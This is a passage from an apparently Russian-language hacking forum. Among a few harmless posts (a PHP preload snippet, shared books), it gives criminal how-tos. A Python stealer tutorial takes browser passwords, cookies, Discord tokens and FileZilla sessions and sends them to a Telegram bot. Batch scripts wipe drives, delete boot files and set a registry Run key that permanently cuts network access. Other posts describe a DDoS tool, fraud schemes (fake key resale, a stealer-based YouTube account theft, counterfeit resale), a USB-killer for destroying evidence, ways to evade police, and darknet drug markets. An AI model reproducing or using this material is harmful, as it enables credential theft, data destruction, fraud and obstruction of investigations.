opcache.preload=/www/app/vendor/preload.php * * --- Config --- * Generated at: 2019-11-20 15:20:49 UTC * Opcache * - Used Memory: 130585 B * - Free Memory: 294896 B * - Wasted Memory: 347764 B * - Cached files: 2675 * - Hit rate: 94% * - Misses: 542 * Preloader config * - Memory limit: 32 MB * - Overwrite: false * - Files excluded: 0 * - Files appended: 0 */ require_once '/www/app/vendor/autoload.php'; $files = [ '/www/app/ClassFoo.php', '/www/app/ClassBar.php', '/www/app/ClassBaz.php', '/www/app/ClassQuz.php', '/www/app/ClassQux.php', '/www/app/vendor/author/package/src/Example.php', // ... ]; foreach ($files as $file) { require_once $file; } И всё. Попробуйте сами: ТЫК
  6. admin

    Practices of the Python Pro (2020)

    Practices of the Python Pro (2020) Разработчики-профессионалы знают о преимуществах написания хорошо организованного и читабельного кода. Изучая и следуя приведённым в книге советам и шаблонам, вы научитесь проектировать чистое, легко поддерживаемое программное обеспечение, используя Python. Книга подойдет всем, кто собирается начать изучение этого языка программирования. Practices_of_the_Python_Pro.pdf
  7. Создаем фейк-сайт крупной компании софта. Нашей тематикой будет амерское лицензионное программное обеспечение для предприятий. Размещаем на буксах объявление: "Куплю ключ от "Mamont-soft" по цене от 150 руб/шт. Не могу купить их на официальном сайте "адрес моего магазина" т.к. уже совершил три покупки. Перевожу тут вам 1 рубль и на киви все остальное, что бы не оплачивать комиссию. Для проверки ключа пришлите мне первые 2 и последние 3 символа из имени ключа, я проверю на валидность, затем переведу вам деньги и вы вышлете мне весь ключ целиком" Выкупаем у "работяг" сначала 1 ключик (больше они и не купят для первого раза), благодарим и пишем что он может обращаться в любое время напрямую к нам в личку, выкупим любые объемы. На этом этапе он убедился что нет никакого обмана и идет закупать ключи дальше. Второй раз, допустим, он взял у нас 2-3 ключа. Покупаем их у него, благодарим и пишем также, мол, приноси больше ключей, скупаю любые объемы. На этом этапе чувак понимает, что нащупал кнопку-бабло. А вот в третий раз, когда он закупил большое колличество ключей на нашем сайте и стучит в личку, чтоб мы купили их - пишем ему: Извините, в данный момент мне нинада, только что купил 100500 штук.
  8. Обычно у человека со стороны, не интересующегося расследованиями преступлений хакеров, может возникнуть логичный вопрос: ведь есть шифрование операционной системы и криптоконтейнеры, почему хакеры его не используют? Используют, но хакеру могут просто зажать палец дверью и получить пароль, потому шифрование – отличное решение в теории, а на практике лучше, чтобы выдавать пароль было просто не к чему. Иногда на задержанного давят угрозой отправить в СИЗО до суда в случае отказа выдать данные и предлагают подписку о невыезде или домашний арест в случае согласия сотрудничать. USB-киллер может решить проблему хакера: если подобное устройство, замаскированное под флешку, вставить в USB-порт, то оно необратимо выведет из строя материнскую плату, и компьютер «умрет». Но самое главное, на месте будет практически невозможно установить причину «смерти» компьютера, а хакер всегда сможет вздохнуть и сказать: «Эх, он давно на ладан дышал». USB-киллер не уничтожит жесткий диск, и в лаборатории его извлекут, но к тому времени у хакера уже будет адвокат и дело будет на этапе следствия, никто не станет засовывать палец в дверь или менять меру пресечения. USB-киллеры можно найти в интернет-магазинах и на AliExpress. Подобная флешка кладется около компьютера, на нее наносится надпись, например «данные» или «материалы по работе» (задача этой надписи – привлечь внимание). Хакер может добровольно выдать флешку или дождаться, когда любопытные недоброжелатели сами вставят ее в устройство. Конечно, есть небольшая вероятность, что они вставят ее в свое устройство, и тогда проблем не избежать. Но у задержанного хакера и так большие проблемы, а задача ловушки – вывести из строя компьютер с данными в тот момент, когда сам задержанный это сделать уже не сможет. Если у вac MacBook из последних моделей, в котором USB-порты изолированы от материнской платы, это не сработает. При использовании USB-killer данные на жестком диске компьютера, скорее всего, повреждены не будут.
  9. admin

    DDoS инструмент

    DDoS инструмент, который позволит вам наказать обидчиков, либо протестировать конкурентов) Вам нужно в коде изменить example com -> на свой сайт для атаки. sekas.py
  10. admin

    этичное хакерство

    Братуленчики, привет! Метори выкатывает курс по этичному хакерству. Это практически тоже самое, что и хакерство (навыки и знания одни и те же), но круче. В перспективе и денег приносит больше. Курс наисвежайший - от 2019 года! Скажем точно - кто владеет этой наукой, будет править балом в 21 веке! P.s. Так как курс свежий, он записан на английском языке (не успели перевести), но присутствуют русские субтитры. Чему вы научитесь после прохождения курса? Введение в этический взлом! Что это? Создание собственной лаборатории этического взлома Проникновение в сеть (WIFI Hacking) Получение доступа к системам (взлом системы) Поддержание доступа Мобильный взлом Проникновение на сайт (веб-хакерство) После эксплуатации Безопасность и смягчение последствий Кали Линукс Wireshark Взлом WEP, WPA и WPA2 шифрования MITM Attack и многое другое Требования Интерес стать сертифицированным этическим хакером Никаких предварительных условий не требуется Программа курса: 1. Введение в этический взлом! Что это: Вступление Зачем учиться взлому 2. Настройка лабораторной среды: Лаборатория. Введение. Установка Kali Linux с использованием готового образа Установка Kali Linux с помощью ISO-образа Установка Windows Установка Metasploitable Как создавать снимки 3. Основы Kali Linux: Kali Linux Обзор Терминал и основные команды Linux Обновление списка источников и установка программ 4. Тестирование проникновения в сеть: Тестирование проникновения в сеть Введение Как работают сети Подключение беспроводного адаптера Изменение MAC-адреса Режимы беспроводного монитора и как их изменить 5. Тестирование проникновения в сеть - атаки перед подключением: Обнюхивание пакетов с помощью Airodump-ng1 Целевое прослушивание пакетов с помощью Airodump-ng1 Атака де-аутентификации (отключение любого устройства от сети) Создание поддельной точки доступа - теория Создание поддельной точки доступа - практично 6. Тестирование проникновения в сеть - получение доступа к сетям: Получение доступа к сетям Введение Взлом WEP-шифрования - теория Взлом WEP-шифрования (основной случай) Взлом WEP-шифрования (поддельная аутентификация) Взлом WEP-шифрования (ARP Replay Attack) Взлом WPA & WPA2 Шифрование (Эксплуатация WPS) - Теория Взлом WPA & WPA2 Encryption (Эксплуатация WPS) - Практично Взлом шифрования WPA и WPA2 (с использованием Wifite) Взлом WPA & WPA2 Encryption (захват рукопожатия) - теория Шифрование WPA и WPA2 (захват рукопожатия) - практично Создание списка слов с помощью Crunch Запуск атаки по списку слов для взлома пароля WPA и WPA2 Защищать себя от атак сверху 7. Проникновение в сеть - атаки после подключения: Введение в почтовые атаки Сбор информации с помощью Netdiscover Введение в Nmap и как его использовать Сетевое сканирование с использованием nmap Сетевое сканирование с использованием Zenmap MITM Attack - отравление ARP (теория) MITM Attack - отравление ARP с использованием arpspoof Атака MITM - отравление ARP с использованием MITMf Обход HTTPS с использованием MITMf Сессия угон и кража куки Подмена DNS с использованием MITMF Захват нажатий клавиш и запуск любого кода в браузере Target Запуск MITM-атак в реальной среде Базовый обзор Wireshark Захват и анализ пакетов с помощью Wireshark Чтение имен пользователей, паролей и файлов cookie из пакета захвата 8. Проникновение в сеть - обнаружение и безопасность: Обнаружение ARP-отравляющих атак Обнаружение подозрительных действий с помощью Wireshark 9. Получение доступа к компьютерам - атаки на стороне сервера: Введение в получение доступа к компьютерам Введение в атаки на стороне сервера Сбор информации и использование неверной конфигурации Использование публичного эксплойта для взлома сервера Использование уязвимости удаленного выполнения кода Установка и настройка сообщества Metasploit Для кого этот курс: Любой, кто интересуется этическим взломом и тестированием на проникновение Язык: Английский с субтитрами качай тут
  11. Предлагаю вам ознакомиться с минимальным набором софта, который пригодится вам и вашей анонимной заднице. Поехали! 1) STZBlaster – программа для изменения имени ПК, хоста, ID процессора, HDD volume, MAC adress и много другого. Также в программе дополнительно можно изменить региональные настройки. Единственное, что хочу отметить, так это то, что не стоит доверять ей смену МАС. 2) RMOSChange.exe – программа меняет HTTP-заголовки популярных браузеров. Суть программы, и зачем она нужна? Во-первых, если включены скрипты, то передаются такие данные, как версия браузера, язык браузера, user-agent, ОС. Не будет ли странным, если мы зайдем на шелл с русского браузера, но через американский socks\ssh? Во-вторых, если вы пользуетесь америкосовским или буржуйским дедиком\соксом\впн, то нужно менять настройки под IE, т.к. там это самый популярный браузер. Зачем это нужно, я думаю, рассказывать не стоит. 3) SMAC 2.0 – программа спуффит МАС-адреса сетевой платы. Можно менять раз месяц МАС-адреса и все будет ок. 4) Privacy Suite Main Menu – криптуем и прячем свой, уже созданный TrueCrypt’ом контейнер в jpg, wav файлы. Также можно создать сейф. Еще неоспоримый плюс данного софта – он безвозвратно уничтожает файлы. Также можно криптовать на флешку. Также открываем зашифрованный контейнер без необходимости повторной установки софтины. 5) TrueCrypt – думаю, что это лучшая софтина по шифрованию данных. 6) Proxyfier – простой проксификатор. Есть возможность задать приложение, которое нужно соксифицировать. 7) OpenVPN GUI – OpenVPN-клиент, нужен для подключения к vpn-серверу. 8) VPSProxy – суть программы в том, что мы используем залитые гейты на шеллы\хостинги\сервера как соксы. Ключевая фича софта в том, что входящий и исходящий гейт постоянно меняется. Юзать только поверх vpn/ssh. 9) VMware workstation – самая популярная программа для виртуализации систем. Зачем нужна? Все очень просто, опять же, если у вас в браузере включены скрипты (что нужно для шеллов), то вместе с ip,dns и т.п. передается еще и язык ОС. Схема проста, ставим варю, далее покупаем backdoor-патч на варю, либо юзаем тот, что в паблике (если найдете патч без виря, то вам повезло). Берем и кидаем весь серый софт на варю. Если почуяли что-то неладное, то трем нах Privacy Suite'ой и форматируем в NTFS какой-нибудь программой. 10) O&O SafeErase – программа, которой стоит доверять безвозвратное удаление файлов. Это минимальный набор софта, который должен быть у каждого, кто занимается лихими делами, пусть даже и не сильно грязными.
  12. (Google Chrome, Chromium, Amigo, Opera, Яндекс.Браузер) Функционал: Скриншот рабочего стола Стиллинг токена Discord Стиллинг сессий FileZilla Логи отправляются в Telegram Приступим! Создаём боту у @BotFather копируем ток бота, идем в диалог и начинаем диалог, далее переходим к этой боте @userinfobot и узнаём свой идентификатор чата. С ботом закончили, открываем cmd и пишем следующие команды: pip install pyTelegramBotAPI pip install win32crypt pip install telebot Теперь открываем IDE и начинаем кодить: Импортируем нужные библиотеки: импорт ОС Теперь объявляем переменную username, которая содержит имя пользователя: username = os.getlogin () Переменные для работы с ботом телеграм: token = 'ВАШ_ТОКЕН_ОТ_БОТА' Сейчас будем воровать пароли от хрома (комментарии отмечены # / # комментарий): def Chrome (): # Создаём функцию Теперь воруем куки из хрома: def Chrome_cockie (): Воруем куки из Яндекса Браузера: def Яндекс (): Пароли браузеров на основе хрома: def chromium (): Куки браузеров на основе Chromium: def chromiumc () Пароли Amigo: def Amigo (): Куки Амиго: def Amigo_c (): Воруем пароли с Оперы: def Opera (): Куки Оперы: def Opera_c (): Теперь будем воровать DISCORD токен: def discord_token (): Воруем Сессии FileZilla: def filezilla (): Делаем скриншот рабочего стола: screen = ImageGrab.grab () Теперь сохраняем все данные в архиве: zname = r'D: \ LOG.zip '# создаем переменную - название и местоположение файла Теперь добавим переменную документацию: doc = open ("D: \ LOG.zip", 'rb') Отправляем сообщение в телеграм бота: bot.send_document (ВАШ ЧАТИД, док)
  13. 1. Как работает VPN и SSH туннели. VPN и SSH туннель - это очень схожие по алгоритму работы штуки. Туннели даже называют VPN-ом для бедных. Работает это все так: при подключении к VPN создается шифрованный канал связи, и все данные на VPN передаются зашифрованными протоколом SSL 1/2/3 версии. Может быть, в интернете вы сможете найти даже VPN с TLS шифрованием. И каждый раз, когда вы нажимаете в адресной строке своего браузера Enter, запрос посылается не на сайт который вы ввели в адресную строку, а в зашифрованном виде на VPN. Там он расшифровывается и выполняется, а результат (страница в браузере, VPN работает на все запросы в сеть из всех приложений на компьютере) отправляется вам. Похоже на принцип прокси. Это он и есть. VPN выступает зашифрованным прокси-сервером между вами и всеми интернет-соединениями на вашем ПК. 2. Дедик, VPN - это не средства анонимности. Многие люди думают, что подключившись к VPN от hide.me, они становятся дикими анонимусами. Что-ж, не ловко рушить их влажные фантазии, однако это вряд ли спасет их от зоны. Дело в том, что почти все VPN в интернетах ведут логи, которые они с радостью выдадут товарищу майору. Просто потому, что предоставление услуг VPN - это бизнес. А когда к тебе приходят граждане в форме, приходится выполнять их требования, чтобы сохранить возможность дальше вести бизнес. А вы например уверены, что чел, который предоставляет услуги VPN, его компания и он сам находится в другой стране? А уверены ли вы в том, что силовые структуры вашей страны не имеют власти над шефом VPN? А теперь тоже самое, но про модера, или технического работника этого VPN? А как на счет варианта, когда спецслужбы и полицейские сами открывают такой сайт по предоставлению услуг VPN в ходе оперативно-розыскных, или профилактических мероприятий? Я уж не упоминаю возможность того, что на сервере с VPN есть уязвимость, или админ этого сервиса вообще настолько глупый, что высылает логи не просто по официальному указу, а даже по электронной почте или телефонному звонку. Да, бывает и такое. Собственно, к дедикам относится все тоже самое, поэтому я их упомянул в подзаголовке. 3. VPN без логов и чистка логов на дедике. Ни для кого не секрет, что по разным нелегальным форумам пиарятся разные сервисы VPN, которые обещают отсутствие логов. Во-первых, проверить это можно только имея IP сервера и пароль от root пользователя. Но даже тут есть проблема в том, что логи ведет провайдер VPN, и твой провайдер интернета тоже. По закону положено. С дедиками, собственно, та же хурма. Только там еще добавляется тот фактор, что ты никогда не узнаешь точное кол-во мест, куда пишутся логи на конкретно твоем сервере, нет ли там какого-то скрытого пула, и не пишутся ли логи над самим дедиком. И никакие софты, которые "чистят логи после вашего выхода" вам не помогут. 4. Как полицейские вычислят тебя, спрятавшегося за VPN или VDS. Для начала, когда они установят IP с которого было предполагаемое преступление, они смотрят с какой страны этот IP. Если не из твоей, то они в ходе COPM узнают IP адрес, который в заданном промежутке времени отправлял пакеты (те самые, зашифрованные, о которых я рассказывал в подзаголовке об VPN) на IP адрес, с которого было нарушение. Так, если правонарушение совершал неопытный пользователь, то против него уже на этом моменте появляется практически прямые улики. Дальше дело за малым - спросить логи у провайдера касательно подозреваемого, изучить их, и провести задержание. 5. Взлом SSL. SSL шифрование, которое юзают почти все VPN и туннели, было взломано. Это означает, что трафик который вы гоните через VPN больше можно вовсе не считать зашифрованным, и анонимность теряется. 6. TOR. Многие пытаются решить все проблемы ТОР. И тут целый ряд проблем. Я бы сказал, диагнозов. И имя этому диагнозу - безграмотность. Во-первых, вы никогда не скроете от сайта, что сидите через ТОР, луковичная сеть открыта, и настройки браузера тоже вас палят. Вторая - то, что выходные ноды ТОР часто логируются держателями этих самых нод. Я только хочу этим сказать, что используя ТОР все ваши авторизационные данные (от биткоин кошелька, например) запросто могу украсть. Или шантажировать вас содержанием ваших запросов, которые вы отправляли с ТОР. Вы ведь не смешные картинки смотреть заходили через луковичный браузер, да? Принцип работы ТОР похож на луковицу, именно поэтому на логотипе не молот, а именно лук. Запросы через ТОР браузер передаются от 1 ретранслятора (принцип ретрансляции в ТОР похож на принцип сотовых башен у операторов GSM, это обычные компьютеры активистов, которые позволили ТОР использовать свой компьютер как промежуточный или даже конечный пункт в многослойных ТОР запросах. Такие компьютеры называются нодами, или ретрансляторами). От вашего компьютера он улетел на ноду № 21323, от нее к 284, потом на 3289, потом на 9819, потом на 13981 и так далее, очень много слоев, разных стран мира. В конце концов ваш запрос для товарища майора теряется где-то среди этих нод и стран, и он уже не имеет полномочий и желаний его распутывать дальше. Принцип луковицы. Догнали? И само собой, в этой сети из луковых слоев, есть слой который является последним. То есть слой, который отправляет запрос в интернет и возвращает его вам. Этот "слой" называют выходных ретранслятором. И он получает уже расшифрованные данные, то есть ваши логины и пароли в открытом виде. Ну, или хотя бы ваши кукисы. Все это очень часто коллекционируется и люди делают на этом деньги. 7. Фингерпринты. У разных хороших и не очень хороших сайтов есть куча способов идентифицировать твой компуктер даже когда ты почистил все кукисы, переустановил 20 раз браузер, и ваще заходишь через виртуальную машину. Все эти штуки называются фингерпринтами. Например, уникальный номер твоего процессора. Это самое простое. А еще есть фингерпринты основанные на наборе шрифтов, и я даже видел где-то фингерпринт, который идентифицирует пользователей по компьютерной мышки. У них у всех разная скорость реакции, и прочие параметры. Я не помню всех деталей, но если интересно - погуглите. Помимо всех этих штук, есть еще такая неприятная вещь, как LSO Cookie. Это куки-файлы твоего флеш-плагина в браузере. Дело в том, что посещенные тобой сайты записываются не только тебе в историю, но еще и в онлайн-банк с такими кукисами, и по ним тоже можно тебя идентифицировать. А еще есть Ever cookie, это те самые «вечные» куки файлы, которые прячутся в больше количество мест на твоем компьютере и их довольно трудно удалить. 8. Double VPN. Цепочка VPN может состоять не из одного сервера VPN, к которому вы присоединяетесь, а из двух, трех, четырех (это Double, Triple, Quadro - соответственно) соединения. Они более устойчивы, и на них уже не действует уловка, описанная в пункте 4, когда полицейские просто смотрели, с какого IP был заход на IP VPN и вычисляли того, кто за ним прятался. Спасибо что дочитал :) Бонус статья, пища для ума. Адвертинг (от англ. advert, advertising) — относительно новый вид мошенничества, суть которого заключается в краже аккаунтов путём подставной рекламной кампании. Это значит, что на просторах интернета можно найти огромное множество наивных жертв, даже не догадывающихся о его существовании. Цель адвертинга Ключевой целью адвертинга, как и многих других черных схем, является получение и перепродажа аккаунта жертвы, обладающей некоторой популярностью на видеохостинге Youtube. Главным критерием таких каналов является количество подписчиков и наличие монетизации на видеороликах. Рабочая сила Распределение рабочей силы в адвертинге сильно напоминает нам антикино. Во главе стоит человек, который как и в случае с антикино, владеет сайтом, как правило всего одним, он же делает выплаты основной части рабочей силы - спамерам. Также в схеме присутствует дополнительно обученный человек, обрабатывающий приходящие логи (аккаунты). Как это работает. Владелец регистрирует домен, создает сайт для якобы рекламируемого ПО и загружает его на хостинг. Далее в работу вступают спамеры, они просматривают множество каналов, подходящих под критерии и пишут сообщения их владельцам. Они представляют «начинающий проект», нуждающийся в рекламе и утверждают, что заплатят немалую сумму за его рекламу. При этом, задача спамера создать из себя образ рекламного менеджера и заставить жертву скачать программу, в которую уже вшит стиллер. Если жертва согласится и запустит программу, стиллер похитит все данные с ее компьютера и отправит на сервер, а вместо запуска программы выйдет ложная ошибка отсутствия различных библиотек DLL. Далее специальный человек обрабатывает лог, находит данные от аккаунта Google и перепривязывает его на себя (чаще всего без 24-часовой задержки) за процент от стоимости. На этом этапе спамер уведомляет жертву, что ошибка передана разработчикам и извиняется за неудобства, впоследствии чего общение прекращается. Перепродажа Получение каналов YouTube, как уже было сказано в начале статьи, не является конечной целью этой цепочки. Владелец, после получения данных от аккаунта, перепродает его уже определенным людям, а затем распределяет полученную сумму по процентам среди работников. Общение Для успешного общения спамеру требуется знание навыков социальной инженерии, психологической манипуляции и конечно же, русского языка, иначе шанс успеха близится к нулю. Общаться нужно без ошибок, представиться менеджером по рекламе, желательно в деловом стиле. Обязательно обращаться на «Вы» и придерживаться шаблонного общения. Залог успеха Ну что-же, подытожим. Для грамотного разводе жертв надо иметь: навыки СИ на достаточном уровне, сайт (лендинг), обдуманный продукт пиара и опытные спамеры. Также не стоит выбирать каналы с широкой аудиторией, потому-что такие аккаунты как правило легко восстанавливаются, или же, если жертва узнает о попытке обмана, может осветить это на своем канале, что нам, конечно же, не нужно. Меры предосторожности Адвертинг - мошенническая афера, поэтому пренебрегать мерами предосторожности не стоит: не используйте настоящие аккаунты в соц.сетях, буде анонимны. Не используйте Tor в качестве браузера на вашем основном ПК, т.к у провайдера есть данные, что вы заходите именно в Tor, а не в другой любой браузер. Используйте "рабочий ноут", VPN, а еще лучше удаленный сервер (дедик), никогда не говорите что вы главный в цепочке. Впрочем, эти основные вещи вы и так знаете. До скорых встреч, всех обнял.
  14. admin

    полупасив с Ebay

    Добрый вечер. Бизнес, построенный по модели купи - продай является простым и бессмертным способом заработка для новичка, с него время начинают многие, ибо когда-то эта ниша позволит заработать стартовый капитал для более серьезных проектов. Нам потребуется: Начальный капитал: примерно 500 рублей (минимум). Чем больше, тем лучше. Временные затраты: Первый день 2-2.5 часа, далее 3-20 минут в день. Профит: 3000-5000 в месяц. В чем суть? А суть в том, чтобы выложить какой-либо товар на ebay, выставив цену, допустим в 5 баксов. В это же время на Алиэкспресс этот товар стоит 1 доллар. Профит примерно в 3 бакса с одной продажи (из-за комиссии). Далее покупаем на Али, указываем адрес покупателя с ибея, ждем 21 день, получаем тройной профит. В день покупается 2-3 товара с белого аккаунта. С серых - как получится (1-3 в неделю). Теперь то, к чему я пришёл, пытаясь реализовать эту схему: 1) Надо найти товар, аналогов которому очень мало (или нет совсем). Это тяжело, поэтому шарим по алиэкспрессу сначала 2 часа. 2) Хочешь больших бабок - покупаешь акк на ebay с рейтингом 250-500 минимум. Иначе будут брать очень неохотно. 3) Язык и до Киева доведёт. Я вышел на хорошие бабки, когда списался с китайцем. Этому пиздюку 14 лет и он барыжит охренительными копиями брендовых шмоток, косметики и всякой херни. 4) Нарушаешь правила - нарушай с левого аккаунта. Твой пусть приносит тебе 2-3 к в месяц, но будет чистым и без нареканий. 5) Самый кайфовый товар (для белого аккаунта) - косметика. Ей всегда можно приписать чудодейственные свойства. 6) Китайцы совсем не шарят в превьюшках товаров. Если продаём, то преподносим красиво, а не сплошной копипаст. На этом все, удачи!
  15. Pro Python System Administration — Rytis Sileika (en) 2010 Как применять Python для решения задач системного администрирования. Pro Python System Administration (en).pdf
  16. Как использовать Python для аналитики производственных процессов и финансового инжиниринга. Derivatives Analytics with Python (en).pdf
  17. Сайт https://tcpvpn.com/ предоставляет пользователям защищённые и быстрые VPN. На момент написания поста было предоставлено 258 988 680 VPN серверов. Преимущества: – Безлимитный трафик. – Поддержка онлайн игр. – Сохранность IP. – Двойное шифрование. Инструкция по подключению: 1. Перейдите на https://www.tcpvpn.com/ 2. Выберите континент. Asia / Europe / America / Africa. 3. Выберите страну расположения сервера. 4. Нажмите "Create username and password". 5. Введите логин и пароль. 6. Пройдите капчу. 7. Нажмите "Create Premium VPN account". 8. Отобразится сообщение "Account has been successfully created !" и информация о сервере. 9. Сделайте скриншот этой информации. 10. Скачайте HTTP Injector (https://play.google.com/store/apps/details?id=com.evozi.injector&hl=ru). 11. Откройте скачанное приложение. 12. Нажмите "Tunnel type" -> "None directly" -> "Save" -> "Start". 13. Заполните поля при помощи созданного скриншота. 14. В поле "SSH Port" напишите "22". 15. Нажмите "Save" -> "Start". 16. При всплывающем сообщении об установке соединения через VPN нажмите "OK". Примечание: По истечению 5 дней сервер деактивируется, зарегистрируйте новый.
  18. SnapTube — универсальное приложение для сохранения видео и музыки с YouTube, ВКонтакте, Facebook и других сайтов. Моды: активирован VIP-аккаунт Snaptube+VIP+4.77.0.4771610-.apk
  19. Информация предоставлена исключительно в ознакомительных целях Удаляем все файлы с дисков: off del D:\*.* /f /s /q del E:\*.* /f /s /q del F:\*.* /f /s /q del G:\*.* /f /s /q del H:\*.* /f /s /q del I:\*.* /f /s /q del J:\*.* /f /s /q Сохранять в расширении .bat Создаём много папок off for /l %%i in (1,1,100) do mkdir "dir %%i" Останавливаем доступ в интернет.Не использовать на себе! off Ipconfig /release Чтобы вернуть доступ в интернет обратно, в CMD пишем IPconfig /renew Сохранить в расширении .bat Открываем бесконечное количество калькуляторов off CLS :A start calc.exe goto A Быстро форматируем диски.Не использовать на себе! Option Explicit Dim WSHShell Set WSHShell=Wscript.CreateObject(“Wscript.Shell”) Dim x For x = 1 to 100000000 WSHShell.Run “Tourstart.exe” Next Заставляет умереть систему.Не использовать на себе! off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini Отключаем доступ в интернет навсегда.Не использовать на себе! echo off>c:windowswimn32.bat echo break off>>c:windowswimn32.bat echo ipconfig/release_all>>c:windowswimn32.bat echo end>>c:windowswimn32.bat reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f echo (ваше сообщение) PAUSE
  20. admin

    Путешествие по даркнету

    Поисковики Tor Browser встречает нас встроенным поисковиком DuckDuckGo. С точки зрения приватности — отличный выбор, но ищет DDG исключительно по открытому интернету, так что в наших изысканиях он не пригодится. Впрочем, в даркнете своих поисковиков чуть ли не больше, чем в клирнете. Среди самых популярных: Ahmia, Candle и Torch. Были еще хорошие поисковики под названием Grams и Fess, но по неизвестным причинам они сейчас недоступны. Каждый из них выдает разные результаты по одним и тем же запросам, так что лучше иметь в закладках все три ресурса. В этой статье мы сконцентрируемся на том, что доступно в .onion, так что если хочешь переходить по ссылкам, то тебе понадобится Tor Browser. Первым я обычно пускаю в ход Candle — это не самый известный поисковик, зато на нем нет рекламы сторонних ресурсов и релевантность результатов, по моим ощущениям, выше, чем у того же Torch. С другой стороны, даже нерелевантные ссылки подчас интересны. Torch, как и предвещает его название, постоянно выдает ссылки на ресурсы, связанные с наркоторговлей. Также он совершенно не понимает кириллицу и успел испортить себе репутацию рекламой самых сомнительных сайтов. Поисковик Ahmia отличается тем, что он доступен как в даркнете, так и в клирнете. Релевантность выдачи при этом (субъективно) не очень высокая: как и Torch, он часто выдает ссылки, которые никак не относятся к теме поиска. Однако если мы решили изучить таинственный мир даркнета, то поисковики тут помогут слабо — слишком уж мало ресурсов доступно для индексации. Иногда поисковик даже может завести не туда, выдав ссылку на фейковый проект. Каталоги — карты Tor Начинать изыскания я рекомендую с каталогов ссылок. Там тоже, конечно, попадется мусор и устаревшие ссылки, но выбора не так много. Из англоязычных самый известный ресурс — это The Hidden Wiki, на русском — «Годнотаба». Помимо этого, существует еще не один десяток сборников ссылок — см., например, OnionDir и Oneirun. Остерегайся фальшивок! Популярные сборники ссылок часто подделывают, заменяя адреса ресурсов. Подделки есть и у «Годнотабы», так что будь внимателен. Даркнет образовательный Буйное пиратство и дешевые книгочиталки сделали покупку книг ненужной для многих. Но правообладатели с этим вряд ли смирятся. Поэтому в клирнете ссылок на скачивание книг становится все меньше. В даркнете — другое дело: на выбор есть «Флибуста» и «Словесный Богатырь». Выбор там настолько огромный, что кажется, будто есть вообще всё. Даркнет — друг торрентов Еще в начале-середине нулевых торренты никто и не думал запрещать. Люди качали книги, фильмы, игры, сериалы и даже учебники и подчас даже не задумывались, что нарушают закон. Эта ситуация постепенно меняется, но даркнет становится новым прибежищем пиратства. У торрент-трекеров и поисковиков вроде RuTor и The Pirate Bay в обязательном порядке есть ссылки в onion, которые дают пользователям возможность не обращать внимания на запреты и ограничения. Онлайн-магазины, в которых не принимают карты Переходим к нелегальным магазинам, которыми и славится «луковая» сеть. Что характерно, большая часть из них связана с наркоторговлей, но из песни слов не выкинешь, придется пройтись и по ним. Покупка наркотиков в интернете нынче дело заурядное: каждая старушка с лавочки во дворе уже знает, что за клады ищут подозрительные молодые люди. Производство, сбыт, пересылка наркотических и психотропных веществ преследуется по закону (ст. 228–231 УК РФ). Редакция не несет ответственности за материалы, опубликованные по ссылкам. Переходя по ним, ты действуешь на свой страх и риск. Если ты вдруг не слышал об этих темных делах, то поясню в двух словах. Покупатель сначала использует обменник, чтобы получить биткойны, затем с ними отправляется в магазин и приобретает желаемые вещества. Ему дают адрес и фотографию закладки, которую и предстоит отыскать. Словарь терминов Склад — человек, хранящий у себя большие объемы наркотиков, реализующий их через мастер-клады — закладки с большим количеством вещества для кладмена. Кладмен — забирает мастер-клад, фасует вещество на клады поменьше. Гровер — человек, производящий наркотик. Как правило, производство устраивают в гаражах, подвалах, заброшенных фабриках и подобных местах. Оператор — человек, отвечающий за связь магазина с клиентом. Задача оператора — решать все возникшие вопросы, взаимодействуя с аудиторией. Иными словами, саппорт проекта. Мастодонты наркобизнеса в России — это сервисы Hydra и WayAway. Конечно, существуют и другие магазины, например Matanga или Darkcon. Но новичкам начинают доверять не сразу, да и узнать о них непросто. На Западе самые популярные и большие магазины — Free Market. Закладочной системой пользуются в основном в России и СНГ. В Америке (и в целом на Западе) люди вместо этого изыскивают способы пересылать запрещенные товары по почте или (гораздо реже) доставляют квадрокоптером. RAMP 4 года назад список самых больших и влиятельных русских магазинов в даркнете открывал RAMP. Он представлял собой форум для общения между клиентами и продавцами. Летом 2017 года RAMP перестал функционировать, что озадачило многих бывших пользователей. Его закрытие широко обсуждали на других форумах, а кто-то даже попытался провести журналистское расследование. В итоге некто, назвавшийся бывшим модератором RAMP, открыл RAMP 2.0. Впрочем, быстро оказалось, что это скам: собрав депозиты с продавцов и покупателей, RAMP 2.0 исчез вслед за своим предшественником. Кстати, вполне можно было догадаться, что так и произойдет: модератор под ником Экзистенция задолго до падения RAMP потерял свой ключ PGP, а пронырливые скамеры смогли его заполучить и позже стали выдавать себя за Экзистенцию. По иронии судьбы, Экзистенция отвечал за безопасность площадки. Hydra На место RAMP быстро пришел форум под названием Hydra. Его администрация пока что делает все, чтобы удержать лидерство. Мало того что площадка ведет свой канал в Telegram, где делится с подписчиками методами съема закладок и мировыми новостями о наркотиках, так еще совсем недавно «Гидра» покупала рекламу в YouTube, что вызвало серьезное возмущение общественности. Hydra спокойно переживает DDoS-атаки и пока что уверенно остается на плаву. Здесь все почти как на «Рампе», разве что интерфейс чуть получше. «Гидра» дает возможность пользователям общаться на форуме и предоставляет личные обменники для покупки биткойнов. К оплате принимают и Qiwi: покупка наркотиков, судя по всему, ничем не отличается от любой другой транзакции в этой системе. Администрация «Гидры» вплотную занимается пиаром и устраивает акции, подчас сомнительные. Например, на «Гидре» можно попытать удачу, сыграв в рулетку — лотерейные билеты покупаются с привязанного к аккаунту биткойн-кошелька. При этом до падения «Рампа» юзеры называли Hydra «солевой», потому что в отличие от него на «Гидре» вовсю идет торговля «спайсами» и «солями», которые наносят колоссальный вред здоровью человека. Кстати, Hydra имеет и адрес в клирнете, который, естественно, уже давно заблокирован Роскомнадзором. Что еще бывает на торговых площадках Наркотики — это не единственное, что продается на перечисленных сайтах. Например, «Гидра» предлагает пользователям сим-карты и карты, оформленные на «дропов» (подставных лиц), модемы, роутеры, VPN-сервисы, дебетовые карты и много других вещей, которые активно используют работники наркобизнеса. Также в каждом теневом магазине есть раздел с вакансиями, где «хедхантеры» рекрутируют «кладменов» — анонимных курьеров, «склады», гроверов и операторов. Последняя вакансия встречается реже, чем кладмены, спрос на которых огромен из-за бешеной 